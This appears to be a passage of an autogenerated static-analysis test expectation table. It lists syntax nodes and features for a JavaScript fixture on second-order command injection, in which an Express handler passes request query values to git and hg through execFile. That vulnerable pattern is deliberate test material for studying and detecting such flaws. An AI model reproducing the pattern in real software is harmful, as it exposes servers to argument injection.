ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:12:15:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:19:15:24 | myArgs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:12 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:12 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:12 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:12 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:12 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:23 | remote.startsWith | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:23 | remote.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:23 | remote.startsWith | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:23 | remote.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:23 | remote.startsWith | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | exceptional return of remote. ... h("--") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | exceptional return of remote. ... h("--") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | exceptional return of remote. ... h("--") | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | exceptional return of remote. ... h("--") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | exceptional return of remote. ... h("--") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:14:17:23 | startsWith | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:14:17:23 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:14:17:23 | startsWith | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:14:17:23 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:14:17:23 | startsWith | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | CalleeFlexibleAccessPath | remote.startsWith | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:25:17:28 | "--" | receiverName | remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:12 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:12 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:12 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:12 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:12 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | exceptional return of execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | exceptional return of execFil ... HEAD"]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | exceptional return of execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:14:18:18 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:21:18:49 | ["ls-re ... "HEAD"] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:22:18:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:43:18:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:12 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:12 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:12 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:12 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:12 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | exceptional return of execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | exceptional return of execFil ... HEAD"]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | exceptional return of execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| 